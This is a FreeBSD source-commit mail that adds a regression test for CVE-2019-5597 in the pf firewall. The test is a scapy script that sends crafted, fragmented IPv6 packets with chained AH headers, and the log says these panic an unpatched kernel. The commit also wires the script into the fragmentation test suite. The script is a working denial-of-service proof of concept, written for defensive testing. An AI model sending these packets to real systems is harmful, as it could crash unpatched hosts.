svn commit: r344692 - head/tests/sys/netpfil/pf

Kristof Provost kp at FreeBSD.org
Fri Mar 1 07:39:57 UTC 2019 

Author: kp
Date: Fri Mar  1 07:39:55 2019
New Revision: 344692
URL: https://svnweb.freebsd.org/changeset/base/344692

Log:
  pf tests: Test CVE-2019-5597
  
  Generate a fragmented packet with different header chains, to provoke
  the incorrect behaviour of pf.
  Without the fix this will trigger a panic.
  
  Obtained from:	Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv

Added:
  head/tests/sys/netpfil/pf/CVE-2019-5597.py   (contents, props changed)
Modified:
  head/tests/sys/netpfil/pf/Makefile
  head/tests/sys/netpfil/pf/fragmentation.sh

Added: head/tests/sys/netpfil/pf/CVE-2019-5597.py
==============================================================================
--- /dev/null	00:00:00 1970	(empty, because file is newly added)
+++ head/tests/sys/netpfil/pf/CVE-2019-5597.py	Fri Mar  1 07:39:55 2019	(r344692)
@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO  = 17
+AH_PROTO   = 51
+FRAG_PROTO = 44
+
+def main():
+    intf = sys.argv[1]
+    ipv6_src = sys.argv[2]
+    ipv6_dst = sys.argv[3]
+
+    ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+    padding = 8
+    fid = random.randint(0,100000)
+    frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+    frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+    
+    pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+            / sp.Raw('XXXX' * 199) \
+            / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+            / frag_1
+
+    pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+    pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+    sp.sendp(pkt0, iface=intf, verbose=False)
+    sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+	main()

Modified: head/tests/sys/netpfil/pf/Makefile
==============================================================================
--- head/tests/sys/netpfil/pf/Makefile	Fri Mar  1 07:37:45 2019	(r344691)
+++ head/tests/sys/netpfil/pf/Makefile	Fri Mar  1 07:39:55 2019	(r344692)
@@ -20,8 +20,10 @@ ATF_TESTS_SH+=	anchor \
 
 ${PACKAGE}FILES+=	utils.subr \
 			echo_inetd.conf \
-			pft_ping.py
+			pft_ping.py \
+			CVE-2019-5597.py
 
 ${PACKAGE}FILESMODE_pft_ping.py=	0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py=	0555
 
 .include <bsd.test.mk>

Modified: head/tests/sys/netpfil/pf/fragmentation.sh
==============================================================================
--- head/tests/sys/netpfil/pf/fragmentation.sh	Fri Mar  1 07:37:45 2019	(r344691)
+++ head/tests/sys/netpfil/pf/fragmentation.sh	Fri Mar  1 07:39:55 2019	(r344692)
@@ -104,6 +104,11 @@ v6_body()
 
 	atf_check -s exit:0 -o ignore\
 		ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+	$(atf_get_srcdir)/CVE-2019-5597.py \
+		${epair_send}a \
+		2001:db8:42::1 \
+		2001:db8:43::3
 }
 
 v6_cleanup()

More information about the svn-src-all mailing list